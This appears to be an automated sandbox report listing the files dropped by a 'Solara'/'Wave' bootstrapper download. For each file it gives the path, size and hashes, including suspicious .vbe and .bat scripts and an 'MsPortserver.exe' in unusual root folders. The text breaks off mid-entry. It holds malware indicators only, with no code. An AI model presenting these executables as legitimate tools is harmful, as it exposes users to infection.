                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe

                                                                                                                                                      Filesize

                                                                                                                                                      90KB

                                                                                                                                                      MD5

                                                                                                                                                      d84e7f79f4f0d7074802d2d6e6f3579e

                                                                                                                                                      SHA1

                                                                                                                                                      494937256229ef022ff05855c3d410ac3e7df721

                                                                                                                                                      SHA256

                                                                                                                                                      dcfc2b4fa3185df415855ec54395d9c36612f68100d046d8c69659da01f7d227

                                                                                                                                                      SHA512

                                                                                                                                                      ed7b0ac098c8184b611b83158eaa86619001e74dba079d398b34ac694ce404ba133c2baf43051840132d6a3a089a375550072543b9fab2549d57320d13502260

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\settings.dat

                                                                                                                                                      Filesize

                                                                                                                                                      280B

                                                                                                                                                      MD5

                                                                                                                                                      6a30857328a233290927b0e18ed2751b

                                                                                                                                                      SHA1

                                                                                                                                                      69ca50cec385012f82f3c8c03963f6694bfd362f

                                                                                                                                                      SHA256

                                                                                                                                                      1eb4b657ad86b5ed10cc560d375c83dd681d188af075a8980900153b96f23317

                                                                                                                                                      SHA512

                                                                                                                                                      5172322b9c393eaefd3b9b28ff25e0930370ca115bfc1a58b1908962d39bbb3f29404c19853f872f354a2fc902a4c1d42c91e688b3a34bbf2441cd1a44c8542d

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\450a456e-1a76-449e-8326-214bdd7eeebc.tmp

                                                                                                                                                      Filesize

                                                                                                                                                      6KB

                                                                                                                                                      MD5

                                                                                                                                                      b751c7d922ac046f1d544252acb426e2

                                                                                                                                                      SHA1

                                                                                                                                                      149a47345c95fbbdd496ff2af209b448c772b967

                                                                                                                                                      SHA256

                                                                                                                                                      82402877eedf9a7e9562db7c56396ea041095f0d562e7006f081011306057472

                                                                                                                                                      SHA512

                                                                                                                                                      dd0fcb561d2cde10bdbfda9ee06e4d6e46337108a5718d96e2a2d35a475a785b623da1737696f3e71354cc12c964269c910e740fc38045fdb13b1641aa6baa17

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Extension Rules\MANIFEST-000001

                                                                                                                                                      Filesize

                                                                                                                                                      41B

                                                                                                                                                      MD5

                                                                                                                                                      5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                      SHA1

                                                                                                                                                      d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                      SHA256

                                                                                                                                                      f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                      SHA512

                                                                                                                                                      de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                      Filesize

                                                                                                                                                      2B

                                                                                                                                                      MD5

                                                                                                                                                      d751713988987e9331980363e24189ce

                                                                                                                                                      SHA1

                                                                                                                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                      SHA256

                                                                                                                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                      SHA512

                                                                                                                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Site Characteristics Database\CURRENT

                                                                                                                                                      Filesize

                                                                                                                                                      16B

                                                                                                                                                      MD5

                                                                                                                                                      46295cac801e5d4857d09837238a6394

                                                                                                                                                      SHA1

                                                                                                                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                      SHA256

                                                                                                                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                      SHA512

                                                                                                                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GrShaderCache\data_0

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                      MD5

                                                                                                                                                      cf89d16bb9107c631daabf0c0ee58efb

                                                                                                                                                      SHA1

                                                                                                                                                      3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

                                                                                                                                                      SHA256

                                                                                                                                                      d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

                                                                                                                                                      SHA512

                                                                                                                                                      8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GrShaderCache\data_1

                                                                                                                                                      Filesize

                                                                                                                                                      264KB

                                                                                                                                                      MD5

                                                                                                                                                      d0d388f3865d0523e451d6ba0be34cc4

                                                                                                                                                      SHA1

                                                                                                                                                      8571c6a52aacc2747c048e3419e5657b74612995

                                                                                                                                                      SHA256

                                                                                                                                                      902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

                                                                                                                                                      SHA512

                                                                                                                                                      376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GrShaderCache\data_2

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                      MD5

                                                                                                                                                      0962291d6d367570bee5454721c17e11

                                                                                                                                                      SHA1

                                                                                                                                                      59d10a893ef321a706a9255176761366115bedcb

                                                                                                                                                      SHA256

                                                                                                                                                      ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                                                                                                                                                      SHA512

                                                                                                                                                      f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GrShaderCache\data_3

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                      MD5

                                                                                                                                                      41876349cb12d6db992f1309f22df3f0

                                                                                                                                                      SHA1

                                                                                                                                                      5cf26b3420fc0302cd0a71e8d029739b8765be27

                                                                                                                                                      SHA256

                                                                                                                                                      e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                                                                                                                                                      SHA512

                                                                                                                                                      e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State

                                                                                                                                                      Filesize

                                                                                                                                                      16KB

                                                                                                                                                      MD5

                                                                                                                                                      376a81aa57e0a6f360e1ab241541da26

                                                                                                                                                      SHA1

                                                                                                                                                      4a2043c947dd95f08c7de0f0e0311622deee517d

                                                                                                                                                      SHA256

                                                                                                                                                      ffad19e19f575ddcdccf0f876582f6681809d2ac31bb202ea740bcac3110ded4

                                                                                                                                                      SHA512

                                                                                                                                                      9edc19278a3c05e80ff0f3811c30e92649bd960cce8fdf768067416b05998fa3a4d56d73177ad4da920d5a419a71a710e169482d5ed690dc00c231f23b879368

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State

                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      d2a25c03515db7277c2cb876a64225fe

                                                                                                                                                      SHA1

                                                                                                                                                      91e5e8976663530fd3522de26681fd0d51f7815c

                                                                                                                                                      SHA256

                                                                                                                                                      f6c3b15a1e24bf95e27d95a321c097198d9d3bb6043fc78d74a9fbebe69ddeeb

                                                                                                                                                      SHA512

                                                                                                                                                      66200080ff08f8fa140daa2ca993b03d2fa56b8c7889bba44d69e054977d96db432ced4dcb2a4ec079b1e917d7e5dacd3345eda32706e08f2f511e5e7ab9737e

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State

                                                                                                                                                      Filesize

                                                                                                                                                      3KB

                                                                                                                                                      MD5

                                                                                                                                                      3cd8add915d75172b7e27a09c7864efd

                                                                                                                                                      SHA1

                                                                                                                                                      1409d15c6583fd67035216ebe4dc02183b9817b9

                                                                                                                                                      SHA256

                                                                                                                                                      412d4fa5007cfd09785a7c5204441a81bcc0f8d22a950ad919262140208213a5

                                                                                                                                                      SHA512

                                                                                                                                                      b45b9ccb3d61a67acbf7dce98fa37fdfdb7fd9e637a0640b86660bfa328cb3962797fa0617ad964eec7c86e366b81390044618238e7070bd2bac50554af7eb6d

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State

                                                                                                                                                      Filesize

                                                                                                                                                      1KB

                                                                                                                                                      MD5

                                                                                                                                                      974a5b39c36c1da08dcd94e202f231fa

                                                                                                                                                      SHA1

                                                                                                                                                      6be2d68287e76daa1e920028043005db1754488f

                                                                                                                                                      SHA256

                                                                                                                                                      fad0868c02798921ba4bca935634ca012be8e5607569bc10e76c207972fd249d

                                                                                                                                                      SHA512

                                                                                                                                                      2546327e549988cfd12763bf73384ba89fda9d0ae7a61f614d2fd1eb76cd2af141d55a1acbce9edd45cf204652050349a988f8ae671e019e6525fc138aad8c75

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State~RFe5ab20b.TMP

                                                                                                                                                      Filesize

                                                                                                                                                      1KB

                                                                                                                                                      MD5

                                                                                                                                                      5d9b117044142605f7d793f10d60cf26

                                                                                                                                                      SHA1

                                                                                                                                                      374d9ec3315e485101dd323510395b24821b2011

                                                                                                                                                      SHA256

                                                                                                                                                      db9e73bbdcf3af7e5810d60cef99bc8887428a439fe99f78b1e5caffca681792

                                                                                                                                                      SHA512

                                                                                                                                                      11f0bbc4aa68628bb79ea8c26e3b1e35f6e40b714837012ce15c02f3812ff52bcf2131b38f028f8609f7b91197e00d342263b6d1e896d6896a87b89f82515eff

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe

                                                                                                                                                      Filesize

                                                                                                                                                      7.2MB

                                                                                                                                                      MD5

                                                                                                                                                      d404b8401ed55307973a2bc463d3012f

                                                                                                                                                      SHA1

                                                                                                                                                      8284abce324a13fcfb408056f4fe87d13cafe5b7

                                                                                                                                                      SHA256

                                                                                                                                                      1b4e7af9ce2ea7dd130f76f19fa2aeb873fbbd041e86b1bd0c855629058d9400

                                                                                                                                                      SHA512

                                                                                                                                                      ff2632180f0ba33e749eca6943a2c89f6e980c808a174c515756d2ae4a5f36102040fd8fd75aa7fa85875bcf2f2ed67edbefa4cc88b711465c368ad37ebb51c7

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

                                                                                                                                                      Filesize

                                                                                                                                                      797KB

                                                                                                                                                      MD5

                                                                                                                                                      36b62ba7d1b5e149a2c297f11e0417ee

                                                                                                                                                      SHA1

                                                                                                                                                      ce1b828476274375e632542c4842a6b002955603

                                                                                                                                                      SHA256

                                                                                                                                                      8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c

                                                                                                                                                      SHA512

                                                                                                                                                      fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solaradrive.exe

                                                                                                                                                      Filesize

                                                                                                                                                      2.3MB

                                                                                                                                                      MD5

                                                                                                                                                      fc986340bd1419dfd20ef669a6284a8d

                                                                                                                                                      SHA1

                                                                                                                                                      4f859ae36b93dc8a368c08d9d620c25ab196c833

                                                                                                                                                      SHA256

                                                                                                                                                      e2aad6b6badae2e1fe17ce121b3f6dcbce59f5743c0af6015c3e0d60217755b2

                                                                                                                                                      SHA512

                                                                                                                                                      37650d306e95889b00a137be5728d1dc40a0ff8b30371dd2198dffd87deb41dbadf36e97c0154b0b8ed9fcc344d20e44d574a7d74d5cb6710cb27b32ef4e93fa

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solarascripts.exe

                                                                                                                                                      Filesize

                                                                                                                                                      2.3MB

                                                                                                                                                      MD5

                                                                                                                                                      76ec97d1cfcaa7b481ae3bdd4e40748b

                                                                                                                                                      SHA1

                                                                                                                                                      d1dbab3b402d6bc8cc966257c13d47367edf21ab

                                                                                                                                                      SHA256

                                                                                                                                                      3df831cec7d0570ae4b721906c88db2f7360d7484989686dd5bc9b99498f03d1

                                                                                                                                                      SHA512

                                                                                                                                                      2f9ca070079f277ac804fd859c34f34524b8e30c5dcb2a372e17131ff49ec3dc92d26103dc6f45ac22ee1b37a66d3a44a59f34455d7bfdcde0239918d96610ef

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\WJtp1U9oSN

                                                                                                                                                      Filesize

                                                                                                                                                      20KB

                                                                                                                                                      MD5

                                                                                                                                                      42c395b8db48b6ce3d34c301d1eba9d5

                                                                                                                                                      SHA1

                                                                                                                                                      b7cfa3de344814bec105391663c0df4a74310996

                                                                                                                                                      SHA256

                                                                                                                                                      5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

                                                                                                                                                      SHA512

                                                                                                                                                      7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe

                                                                                                                                                      Filesize

                                                                                                                                                      1.5MB

                                                                                                                                                      MD5

                                                                                                                                                      c822ab5332b11c9185765b157d0b6e17

                                                                                                                                                      SHA1

                                                                                                                                                      7fe909d73a24ddd87171896079cceb8b03663ad4

                                                                                                                                                      SHA256

                                                                                                                                                      344700d3141170111a9b77db100f6961cc54a2988d964d34f7e1ca57aa42aa2a

                                                                                                                                                      SHA512

                                                                                                                                                      a8612836fb4714b939d03f7fe08391bbc635ca83ab853fc677159e5db6b00f76b9b586bdae9c19d2406d9a2713d1caf614132cb6c14e1dddc6ac45e47f7e5a5d

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ujq5tocf.hkh.ps1

                                                                                                                                                      Filesize

                                                                                                                                                      60B

                                                                                                                                                      MD5

                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                      SHA1

                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                      SHA256

                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                      SHA512

                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\h27APQkBIu

                                                                                                                                                      Filesize

                                                                                                                                                      100KB

                                                                                                                                                      MD5

                                                                                                                                                      45504a732c2261ea90b34d223cc73ea9

                                                                                                                                                      SHA1

                                                                                                                                                      4726c7f640a60a2d96cd7c2d7dc347bee38a38b4

                                                                                                                                                      SHA256

                                                                                                                                                      19ca1fc27a0eaaeddb5cc49534603aaa35ea17199b002cfb7af33647b0ef0d6e

                                                                                                                                                      SHA512

                                                                                                                                                      37a2c201ef424e1555bb097aa834e5a83b1c98d57fff71a94ab1bc88e6fd519e35e4a55bd694a914b1257379b9fa241f3d6e4f402dd0517ca565c9300c538711

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lHObWKFqz5

                                                                                                                                                      Filesize

                                                                                                                                                      28KB

                                                                                                                                                      MD5

                                                                                                                                                      6443b09b6e59e3c5dace553d1c77dce9

                                                                                                                                                      SHA1

                                                                                                                                                      b8c2b84371ff265be31cac9e69c6dc52a265f388

                                                                                                                                                      SHA256

                                                                                                                                                      6bfe6b1fcf62bffeffa26a3b2091b2519cf26e791bd989a20a4e374cf3c43e20

                                                                                                                                                      SHA512

                                                                                                                                                      62f2c1f71d9905b1086262f81df82ca30ab73da5433a41adabab18e979b1ca63269b6f656643d0dffcfb3d05483d1141b33c122ca2f2579987b98b5d4a848be1

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

                                                                                                                                                      Filesize

                                                                                                                                                      30.1MB

                                                                                                                                                      MD5

                                                                                                                                                      0e4e9aa41d24221b29b19ba96c1a64d0

                                                                                                                                                      SHA1

                                                                                                                                                      231ade3d5a586c0eb4441c8dbfe9007dc26b2872

                                                                                                                                                      SHA256

                                                                                                                                                      5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d

                                                                                                                                                      SHA512

                                                                                                                                                      e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\solara.exe

                                                                                                                                                      Filesize

                                                                                                                                                      1.8MB

                                                                                                                                                      MD5

                                                                                                                                                      4c7ed600c86e1359d74ee54244f3f5b4

                                                                                                                                                      SHA1

                                                                                                                                                      becd9d29a85fe3ff7601c93b02d271a627dfc3e8

                                                                                                                                                      SHA256

                                                                                                                                                      3a1b626df8d7a9f83b55d46fd7ce402b76f2198ee6908e8e058c84397206e7a5

                                                                                                                                                      SHA512

                                                                                                                                                      74f127060857189f4b30c95666c6333ae7887a7615ace39e687ffdc8715bb9dd400e2e5e1af056ae22176bcca957f15a572c9204d9d8a9fd6d8c801929416452

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe

                                                                                                                                                      Filesize

                                                                                                                                                      24.1MB

                                                                                                                                                      MD5

                                                                                                                                                      e091e9e5ede4161b45b880ccd6e140b0

                                                                                                                                                      SHA1

                                                                                                                                                      1a18b960482c2a242df0e891de9e3a125e439122

                                                                                                                                                      SHA256

                                                                                                                                                      cee28f29f904524b7f645bcec3dfdfe38f8269b001144cd909f5d9232890d33b

                                                                                                                                                      SHA512

                                                                                                                                                      fa8627055bbeb641f634b56059e7b5173e7c64faaa663e050c20d01d708a64877e71cd0b974282c70cb448e877313b1cf0519cf6128c733129b045f2b961a09b

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe

                                                                                                                                                      Filesize

                                                                                                                                                      939KB

                                                                                                                                                      MD5

                                                                                                                                                      258a9cae6024c91784bbd8aa5379e86f

                                                                                                                                                      SHA1

                                                                                                                                                      fe1a808ba23053413359a78d5ec096b2cd540dd5

                                                                                                                                                      SHA256

                                                                                                                                                      3881840473ec5286189d2fc8e85f0f26a2532890055d1653da9580aa31b2d0e5

                                                                                                                                                      SHA512

                                                                                                                                                      b621ef432b430d2df0443fa0ebdd59dc7de6b32375c2fc83e8474838843c4abcf4a35f2b5f80e78911fc52336d71812ca9fbc9919314ea3b59bd26036a4ea5a5

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe

                                                                                                                                                      Filesize

                                                                                                                                                      7.5MB

                                                                                                                                                      MD5

                                                                                                                                                      d480fa673e647e8724368ebdc25e0466

                                                                                                                                                      SHA1

                                                                                                                                                      e9d79aa2ecbdae35092e05f2d7dec4bcb8cf1a78

                                                                                                                                                      SHA256

                                                                                                                                                      97e79046d57739603a980f5a5fb0642c05a082781095b9a7eb8475083ecd5703

                                                                                                                                                      SHA512

                                                                                                                                                      5f34adcb185556428e4351fb6ab0e009a8e0585e1f5fbefc480bfd5fcaa7321ede5d9d58ad28bd4d987c273cb35e057e04ba39add1a47615de4b2bba28bc7551

                                                                                                                                                    • C:\Users\Admin\Downloads\Unconfirmed 745175.crdownload

                                                                                                                                                      Filesize

                                                                                                                                                      7.6MB

                                                                                                                                                      MD5

                                                                                                                                                      dbb820772caf0003967ef0f269fbdeb1

                                                                                                                                                      SHA1

                                                                                                                                                      31992bd4977a7dfeba67537a2da6c9ca64bc304c

                                                                                                                                                      SHA256

                                                                                                                                                      b2ac1e407ed3ecd7c7faa6de929a68fb51145662cf793c40b69eb59295bba6bc

                                                                                                                                                      SHA512

                                                                                                                                                      e8ac879c7198dffb78bc6ee4ad49b5de40a5a7dbbda53d427d0a034941487d13c8bb2b8d590a1fcdd81cd6abb8f21fdfcd52924eb00c45a42ee06c1e4b3d590f

                                                                                                                                                    • C:\Windows\Installer\MSI5A64.tmp

                                                                                                                                                      Filesize

                                                                                                                                                      122KB

                                                                                                                                                      MD5

                                                                                                                                                      9fe9b0ecaea0324ad99036a91db03ebb

                                                                                                                                                      SHA1

                                                                                                                                                      144068c64ec06fc08eadfcca0a014a44b95bb908

                                                                                                                                                      SHA256

                                                                                                                                                      e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9

                                                                                                                                                      SHA512

                                                                                                                                                      906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176

                                                                                                                                                    • C:\Windows\Installer\MSI5CD7.tmp

                                                                                                                                                      Filesize

                                                                                                                                                      211KB

                                                                                                                                                      MD5

                                                                                                                                                      a3ae5d86ecf38db9427359ea37a5f646

                                                                                                                                                      SHA1

                                                                                                                                                      eb4cb5ff520717038adadcc5e1ef8f7c24b27a90

                                                                                                                                                      SHA256

                                                                                                                                                      c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74

                                                                                                                                                      SHA512

                                                                                                                                                      96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

                                                                                                                                                    • C:\Windows\Temp\{101B2F56-D875-4A54-ADFA-EAB25D6633C5}\.ba\logo.png

                                                                                                                                                      Filesize

                                                                                                                                                      1KB

                                                                                                                                                      MD5

                                                                                                                                                      d6bd210f227442b3362493d046cea233

                                                                                                                                                      SHA1

                                                                                                                                                      ff286ac8370fc655aea0ef35e9cf0bfcb6d698de

                                                                                                                                                      SHA256

                                                                                                                                                      335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef

                                                                                                                                                      SHA512

                                                                                                                                                      464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b

                                                                                                                                                    • C:\mswebFonthost\bDIv21uOAA97P6b9m4I8TmK.vbe

                                                                                                                                                      Filesize

                                                                                                                                                      215B

                                                                                                                                                      MD5

                                                                                                                                                      b14bd51d581804d71be0a8949d7ece96

                                                                                                                                                      SHA1

                                                                                                                                                      c173cdf7ea1a74fa94e56646dcb1b85605de0dff

                                                                                                                                                      SHA256

                                                                                                                                                      1d0dadb5f682539645fe1dae81bb8368498293eeb776686506fb8146424a7082

                                                                                                                                                      SHA512

                                                                                                                                                      282d62cae18393fca19aceabea8d6833ad3afce783a82b3f6ce98af47eef64e0997962137bb5916809a6baf5716284e591ba6a05ab0b18e38a32a031415b6352

                                                                                                                                                    • C:\providerWebFont\J8q9PLSI7w6bLMkKpRLxNzvjn.bat

                                                                                                                                                      Filesize

                                                                                                                                                      106B

                                                                                                                                                      MD5

                                                                                                                                                      f14869a69723fa0602532a222ea17111

                                                                                                                                                      SHA1

                                                                                                                                                      85fa89b4e5138d358ebdf6990c0854ed5c7de534

                                                                                                                                                      SHA256

                                                                                                                                                      2299ee853bb41e4e2cf6afe4b719087d71e37bd87f6803a86d3bff0f7e73999d

                                                                                                                                                      SHA512

                                                                                                                                                      fee6fb39b1b90933c8cba6f576c57e3b3f1f0c406d8dc75dec2655a20610d452d6e518ec64a92d9582c8a03e7185597f96a76670556af67023a2de792dc2cee8

                                                                                                                                                    • C:\providerWebFont\MsPortserver.exe

                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                      MD5

                                                                                                                                                      cbf79f172c79a8ffd329548b47c95628

                                                                                                                                                      SHA1

                                                                                                                                                      ea026b43b6a072cd7553cea404012637dfc14521

                                                                                                                                                      SHA256

                                                                                                                                                      494bad8ba2eeb38b31c92466709e0fb963afa15f49b14a3c28bbe4b34a5fde8f

                                                                                                                                                      SHA512

                                                                                                                                                      8c847222c2d93644f19dd5aa906ccf96394f6684eaf270a21dc6cbcfa81bb2dec1b53bf3131151d1092a4dc1ec9543dc5195dc0e7499df60bcee5c2a6297adf1

                                                                                                                                                    • C:\providerWebFont\rp9B7DqmQLcraqXwEvd0Obt7HxyhXRo2XNrbvC.vbe

                                                                                                                                                      Filesize

                                                                                                                                                      229B

                                                                                                                                                      MD5

                                                                                                                                                      d55a05cf5b7a02e4135c81f60e8bdb38

                                                                                                                                                      SHA1

                                                                                                                                                      af15a479f100cba8f727f6bd45e43ccef153ca06

                                                                                                                                                      SHA256

                                                                                                                                                      63a572952213da9f3fe8b43264864212beac31b1a382d37777afdcac1b149de0

                                                                                                                                                      SHA512

                                                                                                                                                      e88077c61ea6ba8e76ea0402327fae1baf0d9c7a4d334ebe5487f99e735b2b09b445b6e89eb7b201ef2276582f9477f25fdea6765a843e0518705217bf0e6e55

                                                                                                                                                    • \??\c:\Program Files\Windows Sidebar\Gadgets\CSC53B5EB11EF1A41F5B2F551D3F39A439E.TMP

                                                                                                                                                      Filesize

                                                                                                                                                      1KB

                                                                                                                                                      MD5

                                                                                                                                                      2dde0a04b3cfc5bca956764d6cdcb81f

                                                                                                                                                      SHA1

                                                                                                                                                      09131c520d3d3ffdfc0e0d9b0d3bac0631610dd7

                                                                                                                                                      SHA256

                                                                                                                                                      0a4c68c7293e89a8a3cbf968d3fa776410dd1aa531483b9f33774f95b243146a

                                                                                                                                                      SHA512

                                                                                                                                                      7a0975ec6b525af8822c739cfaaeee51d1fd0b5b9cb08fd1836096f3b76370f9e9476ee4a3dba4a0c4177e892ba145b690668d2d2592c3b5c5c7d38daeb1c799

                                                                                                                                                    • \??\c:\Surrogateprovidercomponentsessionmonitor\CSCCEC5C5E5F46340409BB67143211E2AFD.TMP

                                                                                                                                                      Filesize

                                                                                                                                                      1KB

                                                                                                                                                      MD5

                                                                                                                                                      5a19d06d97f234bca8875d6a6df57599

                                                                                                                                                      SHA1

                                                                                                                                                      78c7c89979be3c731628d4458a2106b64581b427

                                                                                                                                                      SHA256

                                                                                                                                                      a55af0ce21c85c7d79fb03aac9f14624a78972a499169c64909b4652e0d314a8

                                                                                                                                                      SHA512

                                                                                                                                                      2ff04c8910caf88ac6e5238da40a4d85245d095b258eac51dbac909ec17b54be81d3dfc7c6cb56d22691123cbf6e5b8ac76331b6920ca672f21d8b07a8bfca9d

                                                                                                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\0aadzhyi\0aadzhyi.0.cs

                                                                                                                                                      Filesize

                                                                                                                                                      397B

                                                                                                                                                      MD5

                                                                                                                                                      c0e04aa37c8d5a26c42db6ac97eeb0e1

                                                                                                                                                      SHA1

                                                                                                                                                      e1185c6ed1e8357612bf72ae3a1d96ebd202b766

                                                                                                                                                      SHA256

                                                                                                                                                      663318f5763a1df85316ac7d19bcbef772f6740154cade1c8dc922190a48139c

                                                                                                                                                      SHA512

                                                                                                                                                      aeb2a0ff2f6ef2b8d79a2acfa9a84de3b745a3ce483ff9dfd204b72a832ecd2db264aff048dd99d4e6407f7bfc29a14dfde3ec2148f62a7677d6459446ec985d

                                                                                                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\0aadzhyi\0aadzhyi.cmdline

                                                                                                                                                      Filesize

                                                                                                                                                      254B

                                                                                                                                                      MD5

                                                                                                                                                      1d9394ce1a8d7336f515190f17c4066e

                                                                                                                                                      SHA1

                                                                                                                                                      3289a4585a82765d80effde293fb6e5d2c8c4756

                                                                                                                                                      SHA256

                                                                                                                                                      d0ed1394ed3709a316119b74c265ce6c0ac63d50ed4acc349b5fec002fbd6170

                                                                                                                                                      SHA512

